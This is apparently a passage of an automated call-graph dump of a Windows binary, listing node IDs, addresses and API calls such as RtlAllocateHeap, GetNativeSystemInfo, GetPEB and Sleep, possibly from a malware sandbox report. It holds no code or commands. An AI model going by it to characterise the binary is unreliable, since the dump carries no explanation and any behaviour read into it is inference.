13775->13763 13777 5f7476 13776->13777 13779 5f745e __cftof __dosmaperr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13776->13779 13778 5f681a __cftof 5 API calls 13777->13778 13777->13779 13780 5f748e 13778->13780 13779->13775 13782 5f79f1 13780->13782 13784 5f7a02 13782->13784 13783 5f7a11 __cftof __dosmaperr 13783->13779 13784->13783 13789 5f7f95 13784->13789 13794 5f7bef 13784->13794 13799 5f7c15 13784->13799 13820 5f7d63 13784->13820 13790 5f7f9e 13789->13790 13791 5f7fa5 13789->13791 13839 5f797d 13790->13839 13791->13784 13793 5f7fa4 13793->13784 13795 5f7bf8 13794->13795 13797 5f7bff 13794->13797 13796 5f797d 5 API calls 13795->13796 13798 5f7bfe 13796->13798 13797->13784 13798->13784 13800 5f7c1c 13799->13800 13805 5f7c36 __cftof __dosmaperr 13799->13805 13801 5f7d7c 13800->13801 13802 5f7de8 13800->13802 13800->13805 13811 5f7dbf 13801->13811 13813 5f7d88 13801->13813 13803 5f7def 13802->13803 13804 5f7e2e 13802->13804 13802->13811 13807 5f7d96 13803->13807 13808 5f7df4 13803->13808 13861 5f8431 13804->13861 13805->13784 13810 5f7db8 13807->13810 13818 5f7da4 13807->13818 13855 5f806e 13807->13855 13808->13811 13812 5f7df9 13808->13812 13809 5f7dcf 13809->13810 13843 5f81bd 13809->13843 13810->13784 13811->13810 13811->13818 13851 5f824d 13811->13851 13812->13810 13812->13818 13847 5f8412 13812->13847 13813->13807 13813->13809 13813->13818 13818->13810 13864 5f8517 13818->13864 13821 5f7d7c 13820->13821 13822 5f7de8 13820->13822 13828 5f7dbf 13821->13828 13829 5f7d88 13821->13829 13823 5f7def 13822->13823 13824 5f7e2e 13822->13824 13822->13828 13826 5f7df4 13823->13826 13834 5f7d96 13823->13834 13825 5f8431 RtlAllocateHeap 13824->13825 13836 5f7da4 13825->13836 13826->13828 13832 5f7df9 13826->13832 13827 5f7dcf 13833 5f81bd 5 API calls 13827->13833 13838 5f7db8 13827->13838 13830 5f824d RtlAllocateHeap 13828->13830 13828->13836 13828->13838 13829->13827 13829->13834 13829->13836 13830->13836 13831 5f806e 5 API calls 13831->13836 13835 5f8412 RtlAllocateHeap 13832->13835 13832->13836 13832->13838 13833->13836 13834->13831 13834->13836 13834->13838 13835->13836 13837 5f8517 5 API calls 13836->13837 13836->13838 13837->13838 13838->13784 13840 5f798f __dosmaperr 13839->13840 13841 5f8959 5 API calls 13840->13841 13842 5f79b2 __dosmaperr 13841->13842 13842->13793 13844 5f81d8 13843->13844 13845 5f820a 13844->13845 13868 5fc63f 13844->13868 13845->13818 13848 5f841e 13847->13848 13849 5f824d RtlAllocateHeap 13848->13849 13850 5f8430 13849->13850 13850->13818 13852 5f8260 13851->13852 13854 5f827b __cftof __dosmaperr 13852->13854 13875 5f75cc 13852->13875 13854->13818 13856 5f8087 13855->13856 13857 5f75cc RtlAllocateHeap 13856->13857 13858 5f80c4 13857->13858 13879 5fd179 13858->13879 13860 5f813a 13860->13818 13860->13860 13862 5f824d RtlAllocateHeap 13861->13862 13863 5f8448 13862->13863 13863->13818 13865 5f858a __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13864->13865 13867 5f8534 13864->13867 13865->13810 13866 5fc63f __cftof 5 API calls 13866->13867 13867->13865 13867->13866 13871 5fc4e4 13868->13871 13870 5fc657 13870->13845 13872 5fc4f4 13871->13872 13873 5f681a __cftof 5 API calls 13872->13873 13874 5fc4f9 __cftof __dosmaperr 13872->13874 13873->13874 13874->13870 13876 5f75f0 13875->13876 13878 5f75e1 __dosmaperr __freea 13875->13878 13877 5faeeb __cftof RtlAllocateHeap 13876->13877 13876->13878 13877->13878 13878->13854 13880 5fd189 __cftof __dosmaperr 13879->13880 13881 5fd19f 13879->13881 13880->13860 13881->13880 13882 5fd236 13881->13882 13883 5fd23b 13881->13883 13885 5fd25f 13882->13885 13886 5fd295 13882->13886 13892 5fc990 13883->13892 13888 5fd27d 13885->13888 13889 5fd264 13885->13889 13909 5fcca9 13886->13909 13905 5fce93 13888->13905 13898 5fcfef 13889->13898 13893 5fc9a2 13892->13893 13894 5f681a __cftof 5 API calls 13893->13894 13895 5fc9b6 13894->13895 13896 5fcca9 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 13895->13896 13897 5fc9be __alldvrm __cftof __dosmaperr _strrchr 13895->13897 13896->13897 13897->13880 13900 5fd01d 13898->13900 13899 5fd08f 13901 5fcd4b GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 13899->13901 13900->13899 13902 5fd068 13900->13902 13903 5fd056 13900->13903 13901->13903 13902->13902 13904 5fcf1e GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 13902->13904 13903->13880 13904->13903 13906 5fcec0 13905->13906 13907 5fceff 13906->13907 13908 5fcf1e GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 13906->13908 13907->13880 13908->13907 13910 5fccc1 13909->13910 13911 5fcd26 13910->13911 13912 5fcd4b GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 13910->13912 13911->13880 13912->13911 14151 5c8690 14152 5c8696 14151->14152 14153 5f6639 RtlAllocateHeap 14152->14153 14154 5c86a3 14153->14154 14155 5c86b6 14154->14155 14156 5f66c7 5 API calls 14154->14156 14157 5c86b0 14156->14157 14773 5cc7d0 14774 5cc827 14773->14774 14779 5d8ce0 14774->14779 14776 5cc83c 14777 5d8ce0 RtlAllocateHeap 14776->14777 14778 5cc878 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14777->14778 14780 5d8e2f 14779->14780 14781 5d8d05 14779->14781 14782 5d9170 RtlAllocateHeap 14780->14782 14785 5d8d4c 14781->14785 14786 5d8d76 14781->14786 14783 5d8e34 14782->14783 14784 5c2380 RtlAllocateHeap 14783->14784 14790 5d8d5d shared_ptr __cftof 14784->14790 14785->14783 14787 5d8d57 14785->14787 14789 5dd2e8 RtlAllocateHeap 14786->14789 14786->14790 14788 5dd2e8 RtlAllocateHeap 14787->14788 14788->14790 14789->14790 14790->14776 14014 5d86d0 14015 5dd2e8 RtlAllocateHeap 14014->14015 14016 5d872a __cftof 14015->14016 14024 5d9ab0 14016->14024 14018 5d8754 14022 5d876c __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14018->14022 14028 5c42f0 14018->14028 14023 5d87df 14025 5d9ae5 14024->14025 14037 5c2be0 14025->14037 14027 5d9b16 14027->14018 14029 5dbddf InitOnceExecuteOnce 14028->14029 14030 5c430a 14029->14030 14031 5c4311 14030->14031 14032 5f6bcb 12 API calls 14030->14032 14034 5dbd50 14031->14034 14033 5c4324 14032->14033 14091 5dbc8b 14034->14091 14036 5dbd66 std::_Xinvalid_argument std::_Throw_future_error 14036->14023 14038 5c2c1d 14037->14038 14039 5dbddf InitOnceExecuteOnce 14038->14039 14040 5c2c46 14039->14040 14041 5c2c88 14040->14041 14042 5c2c51 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14040->14042 14046 5dbdf7 14040->14046 14055 5c2340 14041->14055 14042->14027 14047 5dbe03 14046->14047 14058 5c2800 14047->14058 14049 5dbe23 std::_Xinvalid_argument 14050 5dbe6a 14049->14050 14051 5dbe73 14049->14051 14066 5dbd7f 14050->14066 14053 5c29e0 13 API calls 14051->14053 14054 5dbe6f 14053->14054 14054->14041 14086 5db4d6 14055->14086 14057 5c2372 14059 5d7f00 RtlAllocateHeap 14058->14059 14060 5c284f 14059->14060 14061 5c25b0 RtlAllocateHeap 14060->14061 14063 5c2867 14061->14063 14062 5c288d shared_ptr 14062->14049 14063->14062 14064 5f37bc ___std_exception_copy RtlAllocateHeap 14063->14064 14065 5c28e4 14064->14065 14065->14049 14067 5dcb34 InitOnceExecuteOnce 14066->14067 14068 5dbd97 14067->14068 14069 5dbd9e 14068->14069 14072 5f6bcb 14068->14072 14069->14054 14071 5dbda7 14071->14054 14077 5f6bd7 __cftof 14072->14077 14073 5f8a8f __cftof 4 API calls 14074 5f6c06 14073->14074 14075 5f6c15 14074->14075 14076 5f6c23 14074->14076 14078 5f6c79 12 API calls 14075->14078 14079 5f689d 5 API calls 14076->14079 14077->14073 14080 5f6c1f 14078->14080 14081 5f6c3d 14079->14081 14080->14071 14082 5f67fd RtlAllocateHeap 14081->14082 14083 5f6c4a 14082->14083 14084 5f6c79 12 API calls 14083->14084 14085 5f6c51 __freea 14083->14085 14084->14085 14085->14071 14087 5db4f1 std::_Xinvalid_argument 14086->14087 14088 5db558 __cftof __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14087->14088 14089 5f8a8f __cftof 4 API calls 14087->14089 14088->14057 14090 5db59f 14089->14090 14092 5c21e0 std::future_error::future_error RtlAllocateHeap 14091->14092 14093 5dbc9f 14092->14093 14093->14036 14158 5d6ab0 14159 5d6ae0 14158->14159 14160 5c5b00 RtlAllocateHeap 14159->14160 14161 5d7840 RtlAllocateHeap 14159->14161 14164 5d4690 14159->14164 14160->14159 14161->14159 14163 5d6b2c Sleep 14163->14159 14165 5d46cb 14164->14165 14276 5d4d50 shared_ptr 14164->14276 14167 5d7840 RtlAllocateHeap 14165->14167 14165->14276 14166 5d4e39 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14166->14163 14168 5d46ec 14167->14168 14169 5c5b00 RtlAllocateHeap 14168->14169 14170 5d46f3 14169->14170 14171 5d7840 RtlAllocateHeap 14170->14171 14173 5d4705 14171->14173 14175 5d7840 RtlAllocateHeap 14173->14175 14174 5d4ef5 14468 5c6900 14174->14468 14177 5d4717 14175->14177 14178 5cbd30 6 API calls 14177->14178 14179 5d4723 14178->14179 14182 5d7840 RtlAllocateHeap 14179->14182 14180 5d4fbe shared_ptr 14478 5c7ce0 14180->14478 14185 5d4738 14182->14185 14183 5d4fcd 14186 5c44b0 RtlAllocateHeap 14183->14186 14184 5d4f05 shared_ptr 14184->14180 14205 5d6a86 14184->14205 14187 5d7840 RtlAllocateHeap 14185->14187 14188 5d4fda 14186->14188 14189 5d4750 14187->14189 14543 5c8290 14188->14543 14191 5c5b00 RtlAllocateHeap 14189->14191 14193 5d4757 14191->14193 14192 5d4fe6 14194 5c44b0 RtlAllocateHeap 14192->14194 14195 5c8490 RtlAllocateHeap 14193->14195 14196 5d4ff3 14194->14196 14197 5d4763 14195->14197 14203 5c44b0 RtlAllocateHeap 14196->14203 14198 5d49dd 14197->14198 14200 5d7840 RtlAllocateHeap 14197->14200 14199 5d7840 RtlAllocateHeap 14198->14199 14274 5d4e7c 14198->14274 14202 5d4a0f 14199->14202 14201 5d477f 14200->14201 14206 5d7840 RtlAllocateHeap 14201->14206 14207 5d7840 RtlAllocateHeap 14202->14207 14208 5d5010 14203->14208 14204 5d7840 RtlAllocateHeap 14204->14205 14205->14204 14209 5c5b00 RtlAllocateHeap 14205->14209 14216 5d4690 13 API calls 14205->14216 14210 5d4797 14206->14210 14211 5d4a24 14207->14211 14212 5d7840 RtlAllocateHeap 14208->14212 14209->14205 14213 5c5b00 RtlAllocateHeap 14210->14213 14214 5d7840 RtlAllocateHeap 14211->14214 14215 5d502e 14212->14215 14217 5d479e 14213->14217 14218 5d4a36 14214->14218 14219 5c5b00 RtlAllocateHeap 14215->14219 14220 5d6b2c Sleep 14216->14220 14221 5c8490 RtlAllocateHeap 14217->14221 14222 5cbd30 6 API calls 14218->14222 14223 5d5035 14219->14223 14220->14205 14225 5d47aa 14221->14225 14226 5d4a42 14222->14226 14224 5d7840 RtlAllocateHeap 14223->14224 14227 5d504a 14224->14227 14225->14198 14230 5d7840 RtlAllocateHeap 14225->14230 14228 5d7840 RtlAllocateHeap 14226->14228 14229 5c5b00 RtlAllocateHeap 14227->14229 14231 5d4a57 14228->14231 14238 5d5051 14229->14238 14232 5d47c7 14230->14232 14233 5d7840 RtlAllocateHeap 14231->14233 14234 5c5b00 RtlAllocateHeap 14232->14234 14235 5d4a6f 14233->14235 14240 5d47cf 14234->14240 14236 5c5b00 RtlAllocateHeap 14235->14236 14237 5d4a76 14236->14237 14239 5c8490 RtlAllocateHeap 14237->14239 14244 5d7f00 RtlAllocateHeap 14238->14244 14241 5d4a82 14239->14241 14242 5d7f00 RtlAllocateHeap 14240->14242 14243 5d7840 RtlAllocateHeap 14241->14243 14241->14276 14252 5d4839 shared_ptr 14242->14252 14245 5d4a9e 14243->14245 14253 5d50cd 14244->14253 14246 5d7840 RtlAllocateHeap 14245->14246 14247 5d4ab6 14246->14247 14248 5c5b00 RtlAllocateHeap 14247->14248 14251 5d4abd 14248->14251 14249 5d7840 RtlAllocateHeap 14250 5d48c6 14249->14250 14255 5c5b00 RtlAllocateHeap 14250->14255 14256 5c8490 RtlAllocateHeap 14251->14256 14252->14249 14254 5d7c20 RtlAllocateHeap 14253->14254 14257 5d5139 14254->14257 14261 5d48ce 14255->14261 14258 5d4ac9 14256->14258 14259 5d8350 RtlAllocateHeap 14257->14259 14260 5d7840 RtlAllocateHeap 14258->14260 14258->14276 14265 5d5175 shared_ptr 14259->14265 14262 5d4ae6 14260->14262 14263 5d7f00 RtlAllocateHeap 14261->14263 14264 5c5b00 RtlAllocateHeap 14262->14264 14266 5d4929 shared_ptr 14263->14266 14267 5d4aee 14264->14267 14271 5d7f00 RtlAllocateHeap 14265->14271 14266->14198 14423 5c9800 14266->14423 14268 5d4b3a 14267->14268 14269 5d4e77 14267->14269 14273 5d7f00 RtlAllocateHeap 14268->14273 14272 5d8040 RtlAllocateHeap 14269->14272 14285 5d523d shared_ptr 14271->14285 14272->14274 14282 5d4b58 shared_ptr 14273->14282 14275 5dc0dc RtlAllocateHeap 14274->14275 14275->14276 14276->14166 14446 5c6590 14276->14446 14277 5d49b5 __dosmaperr 14277->14198 14279 5f8959 5 API calls 14277->14279 14278 5d7840 RtlAllocateHeap 14280 5d4be5 14278->14280 14279->14198 14283 5c5b00 RtlAllocateHeap 14280->14283 14281 5c44b0 RtlAllocateHeap 14284 5d52dd 14281->14284 14282->14276 14282->14278 14289 5d4bed 14283->14289 14286 5d7840 RtlAllocateHeap 14284->14286 14285->14281 14287 5d52f7 14286->14287 14288 5c5b00 RtlAllocateHeap 14287->14288 14290 5d5302 14288->14290 14292 5d7f00 RtlAllocateHeap 14289->14292 14291 5c44b0 RtlAllocateHeap 14290->14291 14293 5d5317 14291->14293 14296 5d4c48 shared_ptr 14292->14296 14294 5d7840 RtlAllocateHeap 14293->14294 14295 5d532b 14294->14295 14297 5c5b00 RtlAllocateHeap 14295->14297 14296->14276 14298 5d7840 RtlAllocateHeap 14296->14298 14299 5d5336 14297->14299 14300 5d4cd7 14298->14300 14301 5d7840 RtlAllocateHeap 14299->14301 14302 5d7840 RtlAllocateHeap 14300->14302 14303 5d5354 14301->14303 14304 5d4cec 14302->14304 14305 5c5b00 RtlAllocateHeap 14303->14305 14306 5d7840 RtlAllocateHeap 14304->14306 14307 5d535f 14305->14307 14308 5d4d07 14306->14308 14309 5d7840 RtlAllocateHeap 14307->14309 14310 5c5b00 RtlAllocateHeap 14308->14310 14311 5d537d 14309->14311 14312 5d4d0e 14310->14312 14313 5c5b00 RtlAllocateHeap 14311->14313 14315 5d7f00 RtlAllocateHeap 14312->14315 14314 5d5388 14313->14314 14316 5d7840 RtlAllocateHeap 14314->14316 14317 5d4d47 14315->14317 14318 5d53a6 14316->14318 14428 5d4270 14317->14428 14319 5c5b00 RtlAllocateHeap 14318->14319 14321 5d53b1 14319->14321 14322 5d7840 RtlAllocateHeap 14321->14322 14323 5d53cf 14322->14323 14324 5c5b00 RtlAllocateHeap 14323->14324 14325 5d53da 14324->14325 14326 5d7840 RtlAllocateHeap 14325->14326 14327 5d53f8 14326->14327 14328 5c5b00 RtlAllocateHeap 14327->14328 14329 5d5403 14328->14329 14330 5d7840 RtlAllocateHeap 14329->14330 14331 5d5421 14330->14331 14332 5c5b00 RtlAllocateHeap 14331->14332 14333 5d542c 14332->14333 14334 5d7840 RtlAllocateHeap 14333->14334 14335 5d544a 14334->14335 14336 5c5b00 RtlAllocateHeap 14335->14336 14337 5d5455 14336->14337 14338 5d7840 RtlAllocateHeap 14337->14338 14339 5d5471 14338->14339 14340 5c5b00 RtlAllocateHeap 14339->14340 14341 5d547c 14340->14341 14342 5d7840 RtlAllocateHeap 14341->14342 14343 5d5493 14342->14343 14344 5c5b00 RtlAllocateHeap 14343->14344 14345 5d549e 14344->14345 14346 5d7840 RtlAllocateHeap 14345->14346 14347 5d54b5 14346->14347 14348 5c5b00 RtlAllocateHeap 14347->14348 14349 5d54c0 14348->14349 14350 5d7840 RtlAllocateHeap 14349->14350 14351 5d54dc 14350->14351 14352 5c5b00 RtlAllocateHeap 14351->14352 14353 5d54e7 14352->14353 14354 5d8160 RtlAllocateHeap 14353->14354 14355 5d54fb 14354->14355 14356 5d8060 RtlAllocateHeap 14355->14356 14357 5d550f 14356->14357 14358 5d8060 RtlAllocateHeap 14357->14358 14359 5d5523 14358->14359 14360 5d8060 RtlAllocateHeap 14359->14360 14361 5d5537 14360->14361 14362 5d8160 RtlAllocateHeap 14361->14362 14363 5d554b 14362->14363 14364 5d8060 RtlAllocateHeap 14363->14364 14365 5d555f 14364->14365 14366 5d8160 RtlAllocateHeap 14365->14366 14367 5d5573 14366->14367 14368 5d8060 RtlAllocateHeap 14367->14368 14369 5d5587 14368->14369 14370 5d8160 RtlAllocateHeap 14369->14370 14371 5d559b 14370->14371 14372 5d8060 RtlAllocateHeap 14371->14372 14373 5d55af 14372->14373 14374 5d8160 RtlAllocateHeap 14373->14374 14375 5d55c3 14374->14375 14376 5d8060 RtlAllocateHeap 14375->14376 14377 5d55d7 14376->14377 14378 5d8160 RtlAllocateHeap 14377->14378 14379 5d55eb 14378->14379 14380 5d8060 RtlAllocateHeap 14379->14380 14381 5d55ff 14380->14381 14382 5d8160 RtlAllocateHeap 14381->14382 14383 5d5613 14382->14383 14384 5d8060 RtlAllocateHeap 14383->14384 14385 5d5627 14384->14385 14386 5d8160 RtlAllocateHeap 14385->14386 14387 5d563b 14386->14387 14388 5d8060 RtlAllocateHeap 14387->14388 14389 5d564f 14388->14389 14390 5d8160 RtlAllocateHeap 14389->14390 14391 5d5663 14390->14391 14392 5d8060 RtlAllocateHeap 14391->14392 14393 5d5677 14392->14393 14394 5d8060 RtlAllocateHeap 14393->14394 14395 5d568b 14394->14395 14396 5d8060 RtlAllocateHeap 14395->14396 14397 5d569f 14396->14397 14398 5d8160 RtlAllocateHeap 14397->14398 14402 5d56b3 shared_ptr 14398->14402 14399 5d649b 14401 5d7840 RtlAllocateHeap 14399->14401 14400 5d6347 14403 5d7840 RtlAllocateHeap 14400->14403 14404 5d64b0 14401->14404 14402->14399 14402->14400 14405 5d635d 14403->14405 14406 5d7840 RtlAllocateHeap 14404->14406 14407 5c5b00 RtlAllocateHeap 14405->14407 14408 5d64c5 14406->14408 14409 5d6368 14407->14409 14555 5c4940 14408->14555 14411 5d8160 RtlAllocateHeap 14409->14411 14422 5d637c shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14411->14422 14412 5d64d4 14413 5d75a0 RtlAllocateHeap 14412->14413 14419 5d651b 14413->14419 14414 5d6616 14415 5d7840 RtlAllocateHeap 14414->14415 14416 5d662c 14415->14416 14418 5c5b00 RtlAllocateHeap 14416->14418 14417 5d8ba0 RtlAllocateHeap 14417->14419 14420 5d6637 14418->14420 14419->14414 14419->14417 14421 5d8060 RtlAllocateHeap 14420->14421 14421->14422 14422->14163 14424 5d7840 RtlAllocateHeap 14423->14424 14425 5c982e 14424->14425 14426 5c5b00 RtlAllocateHeap 14425->14426 14427 5c9837 shared_ptr __cftof __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14426->14427 14427->14277 14429 5d7840 RtlAllocateHeap 14428->14429 14430 5d42b2 14429->14430 14431 5d7840 RtlAllocateHeap 14430->14431 14432 5d42c4 14431->14432 14433 5c8490 RtlAllocateHeap 14432->14433 14434 5d42cd 14433->14434 14435 5d4526 14434->14435 14445 5d42d8 shared_ptr 14434->14445 14436 5d7840 RtlAllocateHeap 14435->14436 14437 5d4537 14436->14437 14438 5d7840 RtlAllocateHeap 14437->14438 14441 5d454c 14438->14441 14439 5d44f0 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14439->14276 14440 5d7f00 RtlAllocateHeap 14440->14445 14442 5d7840 RtlAllocateHeap 14441->14442 14442->14439 14443 5d9180 RtlAllocateHeap 14443->14445 14444 5d7840 RtlAllocateHeap 14444->14445 14445->14439 14445->14440 14445->14443 14445->14444 14447 5c65ef 14446->14447 14448 5d7840 RtlAllocateHeap 14447->14448 14449 5c6656 14448->14449 14450 5c5b00 RtlAllocateHeap 14449->14450 14451 5c6661 14450->14451 14452 5c21c0 5 API calls 14451->14452 14453 5c6679 shared_ptr 14452->14453 14454 5d7840 RtlAllocateHeap 14453->14454 14466 5c6893 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14453->14466 14455 5c66e2 14454->14455 14456 5c5b00 RtlAllocateHeap 14455->14456 14457 5c66ed 14456->14457 14458 5c21c0 5 API calls 14457->14458 14467 5c6707 shared_ptr 14458->14467 14459 5c6802 14460 5d7f00 RtlAllocateHeap 14459->14460 14462 5c684c 14460->14462 14461 5d7840 RtlAllocateHeap 14461->14467 14463 5d7f00 RtlAllocateHeap 14462->14463 14463->14466 14464 5c5b00 RtlAllocateHeap 14464->14467 14465 5c21c0 5 API calls 14465->14467 14466->14174 14467->14459 14467->14461 14467->14464 14467->14465 14467->14466 14469 5c6c51 14468->14469 14477 5c6978 shared_ptr 14468->14477 14470 5c6c74 14469->14470 14471 5c6d13 14469->14471 14472 5d7f00 RtlAllocateHeap 14470->14472 14473 5d8040 RtlAllocateHeap 14471->14473 14474 5c6c93 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14472->14474 14473->14474 14474->14184 14475 5d7f00 RtlAllocateHeap 14475->14477 14476 5d9180 RtlAllocateHeap 14476->14477 14477->14469 14477->14471 14477->14474 14477->14475 14477->14476 14479 5c7d46 __cftof 14478->14479 14480 5d7840 RtlAllocateHeap 14479->14480 14515 5c7e98 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14479->14515 14481 5c7d77 14480->14481 14482 5c5b00 RtlAllocateHeap 14481->14482 14483 5c7d82 14482->14483 14484 5d7840 RtlAllocateHeap 14483->14484 14485 5c7da4 14484->14485 14486 5c5b00 RtlAllocateHeap 14485->14486 14488 5c7daf shared_ptr 14486->14488 14487 5c7e83 GetNativeSystemInfo 14489 5c7e87 14487->14489 14488->14487 14488->14489 14488->14515 14490 5c7eef 14489->14490 14491 5c7fc9 14489->14491 14489->14515 14493 5d7840 RtlAllocateHeap 14490->14493 14492 5d7840 RtlAllocateHeap 14491->14492 14494 5c7ff5 14492->14494 14495 5c7f10 14493->14495 14496 5c5b00 RtlAllocateHeap 14494->14496 14497 5c5b00 RtlAllocateHeap 14495->14497 14498 5c7ffc 14496->14498 14499 5c7f17 14497->14499 14500 5d7840 RtlAllocateHeap 14498->14500 14501 5d7840 RtlAllocateHeap 14499->14501 14503 5c8014 14500->14503 14502 5c7f2f 14501->14502 14504 5c5b00 RtlAllocateHeap 14502->14504 14505 5c5b00 RtlAllocateHeap 14503->14505 14507 5c7f36 14504->14507 14506 5c801b 14505->14506 14508 5d7840 RtlAllocateHeap 14506->14508 14562 5f8a61 14507->14562 14510 5c804c 14508->14510 14511 5c5b00 RtlAllocateHeap 14510->14511 14512 5c8053 14511->14512 14513 5c5620 RtlAllocateHeap 14512->14513 14514 5c8062 14513->14514 14516 5d7840 RtlAllocateHeap 14514->14516 14515->14183 14517 5c809d 14516->14517 14518 5c5b00 RtlAllocateHeap 14517->14518 14519 5c80a4 14518->14519 14520 5d7840 RtlAllocateHeap 14519->14520 14521 5c80bc 14520->14521 14522 5c5b00 RtlAllocateHeap 14521->14522 14523 5c80c3 14522->14523 14524 5d7840 RtlAllocateHeap 14523->14524 14525 5c80f4 14524->14525 14526 5c5b00 RtlAllocateHeap 14525->14526 14527 5c80fb 14526->14527 14528 5c5620 RtlAllocateHeap 14527->14528 14529 5c810a 14528->14529 14530 5d7840 RtlAllocateHeap 14529->14530 14531 5c8145 14530->14531 14532 5c5b00 RtlAllocateHeap 14531->14532 14533 5c814c 14532->14533 14534 5d7840 RtlAllocateHeap 14533->14534 14535 5c8164 14534->14535 14536 5c5b00 RtlAllocateHeap 14535->14536 14537 5c816b 14536->14537 14538 5d7840 RtlAllocateHeap 14537->14538 14539 5c819c 14538->14539 14540 5c5b00 RtlAllocateHeap 14539->14540 14541 5c81a3 14540->14541 14542 5c5620 RtlAllocateHeap 14541->14542 14542->14515 14544 5c82f5 __cftof 14543->14544 14545 5d7840 RtlAllocateHeap 14544->14545 14554 5c8313 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14544->14554 14546 5c832c 14545->14546 14547 5c5b00 RtlAllocateHeap 14546->14547 14548 5c8337 14547->14548 14549 5d7840 RtlAllocateHeap 14548->14549 14550 5c8359 14549->14550 14551 5c5b00 RtlAllocateHeap 14550->14551 14552 5c8364 shared_ptr 14551->14552 14553 5c8434 GetNativeSystemInfo 14552->14553 14552->14554 14553->14554 14554->14192 14556 5d7f00 RtlAllocateHeap 14555->14556 14557 5c4993 14556->14557 14558 5d7f00 RtlAllocateHeap 14557->14558 14559 5c49ac 14558->14559 14565 5c4590 14559->14565 14561 5c4a39 shared_ptr 14561->14412 14563 5f86b7 5 API calls 14562->14563 14564 5f8a7f 14563->14564 14564->14515 14566 5d7f00 RtlAllocateHeap 14565->14566 14573 5c4622 shared_ptr 14566->14573 14567 5c4918 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14567->14561 14568 5d7f00 RtlAllocateHeap 14572 5c4788 shared_ptr 14568->14572 14569 5d7f00 RtlAllocateHeap 14569->14573 14570 5d9180 RtlAllocateHeap 14570->14572 14571 5d9180 RtlAllocateHeap 14571->14573 14572->14567 14572->14568 14572->14570 14574 5c4938 14572->14574 14573->14569 14573->14571 14573->14572 14573->14574 14575 5d7f00 RtlAllocateHeap 14574->14575 14576 5c4993 14575->14576 14577 5d7f00 RtlAllocateHeap 14576->14577 14578 5c49ac 14577->14578 14579 5c4590 RtlAllocateHeap 14578->14579 14580 5c4a39 shared_ptr 14579->14580 14580->14561 14635 5da110 14636 5da190 14635->14636 14648 5d7010 14636->14648 14638 5da230 14668 5c3740 14638->14668 14639 5da1cc 14639->14638 14656 5d7b90 14639->14656 14642 5da29e shared_ptr 14643 5dd2e8 RtlAllocateHeap 14642->14643 14645 5da3be shared_ptr 14642->14645 14644 5da35e 14643->14644 14676 5c3de0 14644->14676 14647 5da3a6 14649 5d7051 14648->14649 14650 5dd2e8 RtlAllocateHeap 14649->14650 14651 5d7078 14650->14651 14652 5d7286 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14651->14652 14653 5dd2e8 RtlAllocateHeap 14651->14653 14652->14639 14654 5d71fb __cftof __Mtx_init_in_situ 14653->14654 14682 5c2dc0 14654->14682 14657 5d7c0b 14656->14657 14658 5d7ba2 14656->14658 14661 5c2380 RtlAllocateHeap 14657->14661 14659 5d7bad 14658->14659 14660 5d7bdc 14658->14660 14659->14657 14663 5d7bb4 14659->14663 14664 5d7bf9 14660->14664 14666 5dd2e8 RtlAllocateHeap 14660->14666 14662 5d7bba 14661->14662 14662->14638 14665 5dd2e8 RtlAllocateHeap 14663->14665 14664->14638 14665->14662 14667 5d7be6 14666->14667 14667->14638 14669 5c37f6 14668->14669 14672 5c375f 14668->14672 14669->14642 14670 5c381b 14731 5d90e0 14670->14731 14672->14669 14672->14670 14674 5c37cd shared_ptr 14672->14674 14675 5d7b90 RtlAllocateHeap 14674->14675 14675->14669 14677 5c3e48 14676->14677 14681 5c3e1e 14676->14681 14678 5c3e58 14677->14678 14734 5c2b00 14677->14734 14678->14647 14681->14647 14683 5c2e7e GetCurrentThreadId 14682->14683 14684 5c2e06 14682->14684 14685 5c2e94 14683->14685 14704 5c2eef 